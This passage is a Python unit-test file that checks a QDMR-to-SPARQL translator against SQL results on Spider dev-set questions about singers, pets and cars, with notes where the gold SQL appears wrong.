equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev39(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 39
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# question: what is the name and nation of the singer who have a song having 'Hey' in its name?
# SQL: SELECT name , country FROM singer WHERE song_name LIKE '%Hey%'
correct_sparql_query = textwrap.dedent("""\
SELECT ?Name ?Country
WHERE
{
?singer arc:singer:Song_Name ?Song_Name.
?singer arc:singer:Name ?Name.
?singer arc:singer:Country ?Country.
FILTER(REGEX(STR(?Song_Name), "(.*hey.*)", "i"))
}""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# SELECT['singers']
# FILTER['#1', 'who have a song having Hey in its name']
# PROJECT['the name of #REF', '#2']
# PROJECT['the nation of #REF', '#2']
# UNION['#3', '#4']
grounding = {}
grounding[GroundingIndex(0,0,"singers")] = GroundingKey.make_table_grounding("singer")
grounding[GroundingIndex(1,1,"who have a song having Hey in its name")] = GroundingKey.make_comparative_grounding("like", "hey", GroundingKey.make_column_grounding("singer", "Song_Name"))
grounding[GroundingIndex(2,0,"the name of #REF")] = GroundingKey.make_column_grounding("singer", "Name")
grounding[GroundingIndex(3,0,"the nation of #REF")] = GroundingKey.make_column_grounding("singer", "Country")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev47(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 47
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# question: How much does the youngest dog weigh?
# SQL is wrong (it does not restrict to dogs): select weight from pets order by pet_age limit 1
correct_sparql_query = textwrap.dedent("""\
SELECT ?weight
WHERE
{
{
SELECT ?PetType_1 ?Pets_1
WHERE
{
{
SELECT (min(?pet_age) AS ?min)
WHERE
{
?Pets arc:Pets:PetType ?PetType.
FILTER(?PetType = "dog").
?Pets arc:Pets:pet_age ?pet_age.
}
}
?Pets_1 arc:Pets:PetType ?PetType_1.
FILTER(?PetType_1 = "dog").
?Pets_1 arc:Pets:pet_age ?pet_age_1.
FILTER(?pet_age_1 = ?min).
}
GROUP BY ?Pets_1
}
?Pets_1 arc:Pets:weight ?weight.
}""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program
# SELECT['dogs']
# PROJECT['age of #REF', '#1']
# COMPARATIVE['#1', '#2', 'is youngest']
# PROJECT['weight of #REF', '#3']
grounding = {}
grounding[GroundingIndex(0,0,"dogs")] = GroundingKey.make_value_grounding("Pets", "PetType", "dog")
grounding[GroundingIndex(1,0,"age of #REF")] = GroundingKey.make_column_grounding("Pets", "pet_age")
grounding[GroundingIndex(2,2,"is youngest")] = GroundingKey.make_comparative_grounding("min", None)
grounding[GroundingIndex(3,0,"weight of #REF")] = GroundingKey.make_column_grounding("Pets", "weight")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev53(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 53
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# question: Find the number of dog pets that are raised by female students (with sex F).
# SQL is wrong:
# SELECT count(*)
# FROM student AS T1 JOIN has_pet AS T2 ON T1.stuid = T2.stuid JOIN pets AS T3 ON T2.petid = T3.petid
# WHERE T1.sex = 'F' AND T3.pettype = 'dog'
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program
# 1: SELECT['students']
# 2: FILTER['#1', 'that are female']
# 3: PROJECT['dog pets raised by #REF', '#2']
# 4: GROUP['count', '#3', '#2']
# 5: AGGREGATE['sum', '#4']
grounding = {}
grounding[GroundingIndex(0,0,"students")] = GroundingKey.make_table_grounding("Student")
grounding[GroundingIndex(1,1,"that are female")] = GroundingKey.make_comparative_grounding("=", "F", GroundingKey.make_column_grounding("Student", "Sex"))
grounding[GroundingIndex(2,0,"dog pets raised by #REF")] = GroundingKey.make_value_grounding("Pets", "PetType", "dog")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
# class TestSpiderDev59(unittest.TestCase):
# @timeout(ONE_TEST_TIMEOUT)
# def test_spider_dev(self):
# """Test an entry from spider dataset
# """
# split_name = "dev"
# i_query = 59
# db_id = get_db_id(split_name, i_query)
# rdf_graph, schema = get_graph_and_schema(split_name, db_id)
# sql_query = get_sql_query(split_name, i_query)
# # question: Find the first name of students who have both cat and dog pets
# # SQL:
# # select t1.fname
# # from student as t1 join has_pet as t2 on t1.stuid = t2.stuid join pets as t3 on t3.petid = t2.petid
# # where t3.pettype = 'cat'
# # intersect
# # select t1.fname
# # from student as t1 join has_pet as t2 on t1.stuid = t2.stuid join pets as t3 on t3.petid = t2.petid
# # where t3.pettype = 'dog'
# # This SPARQL query looks correct but does not work because the intersection of two filters is the empty set.
# # What to do with it?
# correct_sparql_query = textwrap.dedent("""\
# SELECT ?Fname
# WHERE
# {
# {
# SELECT ?Student
# WHERE
# {
# {
# SELECT ?Student
# WHERE
# {
# ?StuID arc:Has_Pet:StuID:Student:StuID ?Student.
# ?Has_Pet arc:Has_Pet:StuID ?StuID.
# ?Has_Pet arc:Has_Pet:PetID:Pets:PetID ?Pets.
# ?Pets arc:Pets:PetType ?PetType.
# FILTER(?PetType = "cat").
# }
# GROUP BY ?Student
# }
# ?StuID_1 arc:Has_Pet:StuID:Student:StuID ?Student.
# ?Has_Pet_1 arc:Has_Pet:StuID ?StuID_1.
# ?Has_Pet_1 arc:Has_Pet:PetID:Pets:PetID ?Pets_1.
# ?Pets_1 arc:Pets:PetType ?PetType_1.
# FILTER(?PetType_1 = "dog").
# }
# GROUP BY ?Student
# }
# ?Student arc:Student:Fname ?Fname.
# }""")
# qdmr = get_qdmr_from_break(split_name, i_query)
# # break_program:
# # SELECT['students']
# # FILTER['#1', 'who have cats']
# # FILTER['#1', 'who have dog pets']
# # INTERSECTION['#1', '#2', '#3']
# # PROJECT['first names of #REF', '#4']
# grounding = {}
# grounding[GroundingIndex(0,0,"students")] = GroundingKey.make_table_grounding("Student")
# grounding[GroundingIndex(1,1,"who have cats")] = GroundingKey.make_comparative_grounding('=', 'cat', GroundingKey.make_column_grounding("Pets", "PetType"))
# grounding[GroundingIndex(2,1,"who have dog pets")] = GroundingKey.make_comparative_grounding('=', 'dog', GroundingKey.make_column_grounding("Pets", "PetType"))
# grounding[GroundingIndex(4,0,"first names of #REF")] = GroundingKey.make_column_grounding("Student", "Fname")
# sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
# result_correct = QueryResult.execute_query_sql(sql_query, schema)
# result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
# equal, message = result.is_equal_to(result_correct,
# require_column_order=True,
# require_row_order=False,
# return_message=True)
# self.assertTrue(equal, message)
class TestSpiderDev71(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 71
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# question: Find the average and maximum age for each type of pet.
# SQL is wrong: SELECT pettype , avg(pet_age) , max(pet_age) FROM pets GROUP BY pettype
correct_sparql_query = textwrap.dedent("""\
SELECT ?PetType ?avg ?max
WHERE
{
{
SELECT ?PetType (avg(?pet_age) AS ?avg)
WHERE
{
?Pets arc:Pets:PetType ?PetType.
?Pets arc:Pets:pet_age ?pet_age.
}
GROUP BY ?PetType
}
{
SELECT ?PetType (max(?pet_age_1) AS ?max)
WHERE
{
?Pets_1 arc:Pets:PetType ?PetType.
?Pets_1 arc:Pets:pet_age ?pet_age_1.
}
GROUP BY ?PetType
}
}""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program
# #1: SELECT['pets']
# #2: PROJECT['types of #REF', '#1']
# #3: PROJECT['ages of #REF', '#2']
# #4: GROUP['avg', '#3', '#2']
# #5: GROUP['max', '#3', '#2']
# #6: UNION['#2', '#4', '#5']
grounding = {}
grounding[GroundingIndex(0,0,"pets")] = GroundingKey.make_table_grounding("Pets")
grounding[GroundingIndex(1,0,"types of #REF")] = GroundingKey.make_column_grounding("Pets", "PetType")
grounding[GroundingIndex(2,0,"ages of #REF")] = GroundingKey.make_column_grounding("Pets", "pet_age")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev97(unittest.TestCase):
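# timeout decorator left disabled while this example is being debugged (see the note below)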
# @timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 97
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# question: Find the model of the car whose weight is below the average weight.
# SQL:
# SELECT T1.model
# FROM CAR_NAMES AS T1 JOIN CARS_DATA AS T2 ON T1.MakeId = T2.Id
# WHERE T2.Weight < (SELECT avg(Weight) FROM CARS_DATA)
# For the correct query, the SPARQL generator wants to group by car_names.Model ("GROUP BY ?Model"),
# which leads to a different result because car_names.Model is not a key.
# This example also has another error worth debugging: spaces in values that are used as keys.
correct_sparql_query = textwrap.dedent("""\
SELECT ?Model
WHERE
{
{
SELECT ?car_names
WHERE
{
?cars_data arc:cars_data:Id:car_names:MakeId ?car_names.
?cars_data arc:cars_data:Weight ?Weight.
{
SELECT (avg(?Weight_1) AS ?avg)
WHERE
{
?cars_data_1 arc:cars_data:Weight ?Weight_1.
}
}
FILTER(?Weight < ?avg).
}
GROUP BY ?car_names
}
?car_names arc:car_names:Model ?Model.
}""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# SELECT['cars']
# PROJECT['models of #REF', '#1']
# PROJECT['weights of #REF', '#2']
# AGGREGATE['avg', '#3']
# COMPARATIVE['#2', '#3', 'is lower than #4']
grounding = {}
grounding[GroundingIndex(0,0,"cars")] = GroundingKey.make_table_grounding("car_names")
grounding[GroundingIndex(1,0,"models of #REF")] = GroundingKey.make_column_grounding("car_names", "Model")
grounding[GroundingIndex(2,0,"weights of #REF")] = GroundingKey.make_column_grounding("cars_data", "Weight")
grounding[GroundingIndex(4,2,"is lower than #4")] = GroundingKey.make_comparative_grounding("<", "#4")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev100(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 100
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# SELECT DISTINCT T1.Maker
# FROM CAR_MAKERS AS T1 JOIN MODEL_LIST AS T2 ON T1.Id = T2.Maker JOIN CAR_NAMES AS T3 ON T2.model = T3.model JOIN CARS_DATA AS T4 ON T3.MakeId = T4.id
# WHERE T4.year = '1970';
correct_sparql_query = textwrap.dedent("""\
SELECT ?Maker_2
WHERE
{
{
SELECT ?car_makers
WHERE
{
{
SELECT ?car_makers
WHERE
{
?Maker arc:model_list:Maker:car_makers:Id ?car_makers.
?model_list arc:model_list:Maker ?Maker.
?model_list arc:model_list:Model ?Model_1.
?Model arc:car_names:Model:model_list:Model ?Model_1.
?car_names arc:car_names:Model ?Model.
}
GROUP BY ?car_makers
}
?Maker_1 arc:model_list:Maker:car_makers:Id ?car_makers.
?model_list_1 arc:model_list:Maker ?Maker_1.
?model_list_1 arc:model_list:Model ?Model_3.
?Model_2 arc:car_names:Model:model_list:Model ?Model_3.
?car_names_1 arc:car_names:Model ?Model_2.
?cars_data arc:cars_data:Id:car_names:MakeId ?car_names_1.
?cars_data arc:cars_data:Year ?Year.
FILTER(?Year = 1970).
}
GROUP BY ?car_makers
}
?car_makers arc:car_makers:Maker ?Maker_2.
}""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# SELECT['different car makers']
# FILTER['#1', 'who produced a car']
# FILTER['#2', 'in 1970']
# PROJECT['the name of #REF', '#3']
grounding = {}
grounding[GroundingIndex(0,0,"different car makers")] = GroundingKey.make_table_grounding("car_makers")
grounding[GroundingIndex(1,1,"who produced a car")] = GroundingKey.make_table_grounding("car_names")
grounding[GroundingIndex(2,1,"in 1970")] = GroundingKey.make_value_grounding("cars_data", "Year", "1970")
grounding[GroundingIndex(3,0,"the name of #REF")] = GroundingKey.make_column_grounding("car_makers", "Maker")
grounding["distinct"] = ["#1"]
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev_change_filter_to_comparative(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 100
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# SELECT DISTINCT T1.Maker
# FROM CAR_MAKERS AS T1 JOIN MODEL_LIST AS T2 ON T1.Id = T2.Maker JOIN CAR_NAMES AS T3 ON T2.model = T3.model JOIN CARS_DATA AS T4 ON T3.MakeId = T4.id
# WHERE T4.year = '1970';
correct_sparql_query = textwrap.dedent("""\
SELECT ?Maker_2
WHERE
{
{
SELECT ?car_makers
WHERE
{
{
SELECT ?car_makers
WHERE
{
?Maker arc:model_list:Maker:car_makers:Id ?car_makers.
?model_list arc:model_list:Maker ?Maker.
?model_list arc:model_list:Model ?Model_1.
?Model arc:car_names:Model:model_list:Model ?Model_1.
?car_names arc:car_names:Model ?Model.
}
GROUP BY ?car_makers
}
?Maker_1 arc:model_list:Maker:car_makers:Id ?car_makers.
?model_list_1 arc:model_list:Maker ?Maker_1.
?model_list_1 arc:model_list:Model ?Model_3.
?Model_2 arc:car_names:Model:model_list:Model ?Model_3.
?car_names_1 arc:car_names:Model ?Model_2.
?cars_data arc:cars_data:Id:car_names:MakeId ?car_names_1.
?cars_data arc:cars_data:Year ?Year.
FILTER(?Year = 1970).
}
GROUP BY ?car_makers
}
?car_makers arc:car_makers:Maker ?Maker_2.
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("car_makers", "Maker"))])
qdmr = get_qdmr_from_break(split_name, i_query)
qdmr.ops[2] = "comparative"
qdmr.args[2] = ["#2", "#2", "in 1970"]
# break_program:
# SELECT['different car makers']
# FILTER['#1', 'who produced a car']
# COMPARATIVE['#2', '#2', 'in 1970']
# PROJECT['the name of #REF', '#3']
grounding = {}
grounding[GroundingIndex(0,0,"different car makers")] = GroundingKey.make_table_grounding("car_makers")
grounding[GroundingIndex(1,1,"who produced a car")] = GroundingKey.make_table_grounding("car_names")
grounding[GroundingIndex(2,2,"in 1970")] = GroundingKey.make_comparative_grounding("=", "1970", GroundingKey.make_column_grounding("cars_data", "Year"))
grounding[GroundingIndex(3,0,"the name of #REF")] = GroundingKey.make_column_grounding("car_makers", "Maker")
grounding["distinct"] = ["#1"]
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev101(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev_corrected_comparative_to_superlative(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 101
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# question: Find the make and production time of the cars that were produced in the earliest year?
# sql_query:
# SELECT T2.Make, T1.Year
# FROM CARS_DATA AS T1 JOIN CAR_NAMES AS T2 ON T1.Id = T2.MakeId
# WHERE T1.Year = (SELECT min(YEAR) FROM CARS_DATA);'
correct_sparql_query = textwrap.dedent("""\
SELECT ?Make ?Year
WHERE
{
{
SELECT (MIN(?years) AS ?min)
WHERE
{
?cars_data_id arc:cars_data:Year ?years.
}
}
?Id arc:cars_data:Id:car_names:MakeId ?MakeId.
?MakeId arc:car_names:Make ?Make.
?Id arc:cars_data:Year ?Year.
FILTER(?Year = ?min).
}""")
qdmr = get_qdmr_from_break(split_name, i_query)
# correct Break: substitute comparative with superlative
qdmr.ops[2] = "superlative"
qdmr.args[2] = ["is the earliest", "#1", "#2"]
# break_program:
# SELECT['cars']
# PROJECT['years #REF were produced', '#1']
# SUPERLATIVE['is the earliest', '#1', '#2'] # original - COMPARATIVE['#1', '#2', 'is the earliest']
# PROJECT['make of #REF', '#3']
# PROJECT['production time of #REF', '#3']
# UNION['#4', '#5']
grounding = {}
grounding[GroundingIndex(0,0,"cars")] = GroundingKey.make_table_grounding("cars_data")
grounding[GroundingIndex(1,0,"years #REF were produced")] = GroundingKey.make_column_grounding("cars_data", "Year")
grounding[GroundingIndex(2,0,"is the earliest")] = GroundingKey.make_comparative_grounding("min", None)
grounding[GroundingIndex(3,0,"make of #REF")] = GroundingKey.make_column_grounding("car_names", "Make")
grounding[GroundingIndex(4,0,"production time of #REF")] = GroundingKey.make_column_grounding("cars_data", "Year")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 101
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# question: Find the make and production time of the cars that were produced in the earliest year?
# sql_query:
# SELECT T2.Make, T1.Year
# FROM CARS_DATA AS T1 JOIN CAR_NAMES AS T2 ON T1.Id = T2.MakeId
# WHERE T1.Year = (SELECT min(YEAR) FROM CARS_DATA);'
correct_sparql_query = textwrap.dedent("""\
SELECT ?Make ?Year
WHERE
{
{
SELECT (MIN(?years) AS ?min)
WHERE
{
?cars_data_id arc:cars_data:Year ?years.
}
}
?Id arc:cars_data:Id:car_names:MakeId ?MakeId.
?MakeId arc:car_names:Make ?Make.
?Id arc:cars_data:Year ?Year.
FILTER(?Year = ?min).
}""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# SELECT['cars']
# PROJECT['years #REF were produced', '#1']
# COMPARATIVE['#1', '#2', 'is the earliest']
# PROJECT['make of #REF', '#3']
# PROJECT['production time of #REF', '#3']
# UNION['#4', '#5']
grounding = {}
grounding[GroundingIndex(0,0,"cars")] = GroundingKey.make_table_grounding("cars_data")
grounding[GroundingIndex(1,0,"years #REF were produced")] = GroundingKey.make_column_grounding("cars_data", "Year")
grounding[GroundingIndex(2,2,"is the earliest")] = GroundingKey.make_comparative_grounding("min", None)
grounding[GroundingIndex(3,0,"make of #REF")] = GroundingKey.make_column_grounding("car_names", "Make")
grounding[GroundingIndex(4,0,"production time of #REF")] = GroundingKey.make_column_grounding("cars_data", "Year")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev105(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 105
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# SELECT['continents']
# PROJECT['car makers on #REF', '#1']
# GROUP['count', '#2', '#1']
# UNION['#1', '#3']
grounding = {}
grounding[GroundingIndex(0,0,"continents")] = GroundingKey.make_column_grounding("continents", "Continent")
grounding[GroundingIndex(1,0,"car makers on #REF")] = GroundingKey.make_table_grounding("car_makers")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev_delete_union_after_group(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 105
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
qdmr = get_qdmr_from_break(split_name, i_query)
# need to decide what to do with union after group by
del qdmr.ops[3]
del qdmr.args[3]
# break_program:
# SELECT['continents']
# PROJECT['car makers on #REF', '#1']
# GROUP['count', '#2', '#1']
grounding = {}
grounding[GroundingIndex(0,0,"continents")] = GroundingKey.make_column_grounding("continents", "Continent")
grounding[GroundingIndex(1,0,"car makers on #REF")] = GroundingKey.make_table_grounding("car_makers")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev108(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 108
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# sql_query:
# SELECT T2.CountryName
# FROM CAR_MAKERS AS T1 JOIN COUNTRIES AS T2 ON T1.Country = T2.CountryId
# GROUP BY T1.Country
# ORDER BY Count(*) DESC LIMIT 1
# question: What is the name of the country with the most car makers?
correct_sparql_query = textwrap.dedent("""\
SELECT ?CountryName
WHERE
{
{
SELECT (max(?count) AS ?max)
WHERE
{
{
SELECT ?countries (count(?car_makers) AS ?count)
WHERE
{
?car_makers arc:car_makers:Id ?car_makers.
?car_makers arc:car_makers:Country ?Country.
?Country arc:car_makers:Country:countries:CountryId ?countries.
}
GROUP BY ?countries
}
}
}
{
SELECT ?countries_1 (count(?car_makers_2) AS ?count_1)
WHERE
{
?car_makers_2 arc:car_makers:Id ?car_makers_2.
?car_makers_2 arc:car_makers:Country ?Country_2.
?Country_2 arc:car_makers:Country:countries:CountryId ?countries_1.
}
GROUP BY ?countries_1
}
FILTER(?count_1 = ?max).
?countries_1 arc:countries:CountryName ?CountryName.
}""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# SELECT['car makers']
# PROJECT['countries of #REF', '#1']
# GROUP['count', '#1', '#2']
# COMPARATIVE['#2', '#3', 'is the highest']
# PROJECT['the name of #REF', '#4']
grounding = {}
grounding[GroundingIndex(0,0,"car makers")] = GroundingKey.make_table_grounding("car_makers")
grounding[GroundingIndex(1,0,"countries of #REF")] = GroundingKey.make_column_grounding("countries", "CountryId")
grounding[GroundingIndex(3,2,"is the highest")] = GroundingKey.make_comparative_grounding("max", None)
grounding[GroundingIndex(4,0,"the name of #REF")] = GroundingKey.make_column_grounding("countries", "CountryName")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev110(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 110
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# sql_query:
# 'SELECT Count(*) , T2.FullName , T2.id
# FROM MODEL_LIST AS T1 JOIN CAR_MAKERS AS T2 ON T1.Maker = T2.Id
# GROUP BY T2.id;
# question: What is the number of car models that are produced by each maker and what is the id and full name of each maker?
# CAUTION: the SQL query has its output columns in the wrong order, so the reference SPARQL below is used instead
correct_sparql_query = textwrap.dedent("""\
SELECT ?count ?car_makers ?FullName
WHERE
{
{
SELECT ?car_makers (count(?model_list) AS ?count)
WHERE
{
?car_makers arc:car_makers:Id ?car_makers.
?Maker arc:model_list:Maker:car_makers:Id ?car_makers.
?model_list arc:model_list:Maker ?Maker.
}
GROUP BY ?car_makers
}
?car_makers arc:car_makers:FullName ?FullName.
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.add_aggregator(OutputColumnId.from_grounding(GroundingKey.make_table_grounding("model_list"), schema), "count"),
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("car_makers", "Id")),
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("car_makers", "FullName"))])
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program
# SELECT['car makers']
# PROJECT['car models of #REF', '#1']
# GROUP['count', '#2', '#1']
# PROJECT['ids of #REF', '#1']
# PROJECT['full names of #REF', '#1']
# UNION['#3', '#4', '#5']
grounding = {}
grounding[GroundingIndex(0,0,"car makers")] = GroundingKey.make_table_grounding("car_makers")
grounding[GroundingIndex(1,0,"car models of #REF")] = GroundingKey.make_table_grounding("model_list")
grounding[GroundingIndex(3,0,"ids of #REF")] = GroundingKey.make_column_grounding("car_makers", "Id")
grounding[GroundingIndex(4,0,"full names of #REF")] = GroundingKey.make_column_grounding("car_makers", "FullName")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev124(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 124
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# sql_query:
# SELECT T1.CountryName , T1.CountryId
# FROM COUNTRIES AS T1 JOIN CAR_MAKERS AS T2 ON T1.CountryId = T2.Country
# GROUP BY T1.CountryId HAVING count(*) >= 1;
# question: What are the names and ids of all countries with at least one car maker?
correct_sparql_query = textwrap.dedent("""\
SELECT ?CountryName ?countries
